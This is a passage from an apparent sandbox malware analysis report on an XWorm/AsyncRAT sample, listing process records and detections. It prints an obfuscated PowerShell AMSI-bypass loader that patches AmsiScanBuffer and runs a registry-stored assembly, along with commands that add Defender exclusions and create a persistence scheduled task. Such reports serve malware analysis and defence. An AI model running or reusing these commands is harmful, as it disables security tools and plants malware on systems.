@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kXUOjVwsnVT=$RJkdRlkUxkpOh.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+'o'+'d'+''+'u'+'l'+[Char](101)+''+'H'+'a'+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+''+[Char](108)+'3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LadMSRasXMAaNc=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$kXUOjVwsnVT,[Object](''+[Char](76)+'oa'+'d'+'L'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$SNikSVGRGIadTTQBM=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$kXUOjVwsnVT,[Object]('V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$HSvqCok=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+'ll');$BNdTdCEoXMsXuDwEG=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$HSvqCok,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+'r')));$DTvdUDKKbk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SNikSVGRGIadTTQBM,$tNZWRoZhdGxbOGCpZBOKKk).Invoke($BNdTdCEoXMsXuDwEG,[uint32]8,4,[ref]$DTvdUDKKbk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BNdTdCEoXMsXuDwEG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SNikSVGRGIadTTQBM,$tNZWRoZhdGxbOGCpZBOKKk).Invoke($BNdTdCEoXMsXuDwEG,[uint32]8,0x20,[ref]$DTvdUDKKbk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](68)+'e'+'a'+''+'d'+''+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:13:14:59
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:13:15:02
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\dllhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}
                                                      Imagebase:0x7ff70f330000
                                                      File size:21'312 bytes
                                                      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:13:15:03
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:13:15:03
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:13:15:03
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:13:15:03
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:13:15:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\winlogon.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:winlogon.exe
                                                      Imagebase:0x7ff7cd660000
                                                      File size:906'240 bytes
                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:12
                                                      Start time:13:15:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\lsass.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\lsass.exe
                                                      Imagebase:0x7ff7a2ae0000
                                                      File size:59'456 bytes
                                                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:13
                                                      Start time:13:15:06
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\Deadsvchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\Public\Deadsvchost.exe
                                                      Imagebase:0x990000
                                                      File size:35'840 bytes
                                                      MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Deadsvchost.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Deadsvchost.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 96%, ReversingLabs
                                                      • Detection: 71%, Virustotal
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:13:15:06
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:16
                                                      Start time:13:15:07
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\dwm.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"dwm.exe"
                                                      Imagebase:0x7ff74e710000
                                                      File size:94'720 bytes
                                                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:17
                                                      Start time:13:15:10
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:19
                                                      Start time:13:15:11
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:20
                                                      Start time:13:15:11
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:21
                                                      Start time:13:15:12
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:22
                                                      Start time:13:15:12
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:23
                                                      Start time:13:15:12
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:24
                                                      Start time:13:15:13
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\Deadsvchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Public\Deadsvchost.exe"
                                                      Imagebase:0x2f0000
                                                      File size:35'840 bytes
                                                      MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:13:15:14
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:26
                                                      Start time:13:15:15
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:27
                                                      Start time:13:15:16
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:28
                                                      Start time:13:15:17
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:29
                                                      Start time:13:15:17
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:13:15:17
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:13:15:18
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:32
                                                      Start time:13:15:18
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:33
                                                      Start time:13:15:19
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:36
                                                      Start time:13:15:20
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:37
                                                      Start time:13:15:20
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:38
                                                      Start time:13:15:20
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:39
                                                      Start time:13:15:21
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\Deadsvchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Public\Deadsvchost.exe"
                                                      Imagebase:0xb70000
                                                      File size:35'840 bytes
                                                      MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:40
                                                      Start time:13:15:21
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:41
                                                      Start time:13:15:22
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:42
                                                      Start time:13:15:23
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:43
                                                      Start time:13:15:23
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:44
                                                      Start time:13:15:24
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:45
                                                      Start time:13:15:24
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:46
                                                      Start time:13:15:25
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:47
                                                      Start time:13:15:26
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\spoolsv.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\spoolsv.exe
                                                      Imagebase:0x7ff646ff0000
                                                      File size:842'752 bytes
                                                      MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed69e48d52b2f0ca14f0f90e54f3762c30f22354503cb7201dbf83fb97090212
                                                        • Instruction ID: e348b023b72b213c02b6010f73cbd6452151a8232c9d3644a81846ce5cf3d74e
                                                        • Opcode Fuzzy Hash: ed69e48d52b2f0ca14f0f90e54f3762c30f22354503cb7201dbf83fb97090212
                                                        • Instruction Fuzzy Hash: B9D1C030B1990D8FDBA8EB68C468ABA77E1FF58711B110679E45ED32E6CE34EC419740
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 165a847d0bd8cdf1d984805687f515b31c9a7571a40b4174e95ddb381f6dbb48
                                                        • Instruction ID: 5949a0e3a767a0359576a3bfb0aea6334eb1991965f44b70197b89e21781a735
                                                        • Opcode Fuzzy Hash: 165a847d0bd8cdf1d984805687f515b31c9a7571a40b4174e95ddb381f6dbb48
                                                        • Instruction Fuzzy Hash: 19311822F0EADF5FE71647B848B55E97F60FF5664070A41BAC0A98B0D7DD24E909C341
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74379f5aab75dd9cfa78187e0bbd99e9d9af710ef1a8b284fc03b5ee716af2c8
                                                        • Instruction ID: 3af02653c2f7a25d422b4f32b1d23869b93a3313c8ad2daa77493edf40aa0749
                                                        • Opcode Fuzzy Hash: 74379f5aab75dd9cfa78187e0bbd99e9d9af710ef1a8b284fc03b5ee716af2c8
                                                        • Instruction Fuzzy Hash: 4C713851B1D9894BE7A8EF7C48797B867D1EFAD360F4501BAE08CC32E7DE2898014341
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5fc24258502d90129a3c0fcea82ada29daa445bb944c0b71d23e7fccfec7035c
                                                        • Instruction ID: 61820bd453afe9576e22dc428954c4a9871ee207304c194e9be54f03262438b9
                                                        • Opcode Fuzzy Hash: 5fc24258502d90129a3c0fcea82ada29daa445bb944c0b71d23e7fccfec7035c
                                                        • Instruction Fuzzy Hash: BB711552F199494BE7A8AF6C48797F877D2EFAD360F45017AE08DC32E6DE2869014341
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3de091e80484af78fd82a8ee6e138559d4ca3e2c24e649747783e065b494c239
                                                        • Instruction ID: 37d77e4429c54438b9859350f2330ae7f14156fb70c5834d10e12ce49dd442d5
                                                        • Opcode Fuzzy Hash: 3de091e80484af78fd82a8ee6e138559d4ca3e2c24e649747783e065b494c239
                                                        • Instruction Fuzzy Hash: C6415B20B2D98D0FD715EB3C88655B57BE1EF8A304B0601F6E08EC71A7D928EC028741
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8de029d17034031beba3e610f08157ff5617be87ef473f689b5d6e22cbce71a9
                                                        • Instruction ID: 0c2d05bf1b763669ef74741b34045d5e29751fb2153c427d4cb7f4b2f77c089a
                                                        • Opcode Fuzzy Hash: 8de029d17034031beba3e610f08157ff5617be87ef473f689b5d6e22cbce71a9
                                                        • Instruction Fuzzy Hash: 5931CA71A8E1951FD31657746C638E23BA49F4722471A42B7E098CB9E3C81D6793C3A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc8a9fd71c47f23c58faeca2d1e0ef8e7414ecd8d5358e338414b7e861dcbad9
                                                        • Instruction ID: 59aa5a967442e2917ede54dc8bffbe61a5accfd8b3e73c7e368c33cfc9077ee9
                                                        • Opcode Fuzzy Hash: fc8a9fd71c47f23c58faeca2d1e0ef8e7414ecd8d5358e338414b7e861dcbad9
                                                        • Instruction Fuzzy Hash: DF01F901F1E84A0BE354AB7C5CB9AF567C1DF9A265B4541B6F44CC32E7DC195C428351
                                                        Memory Dump Source
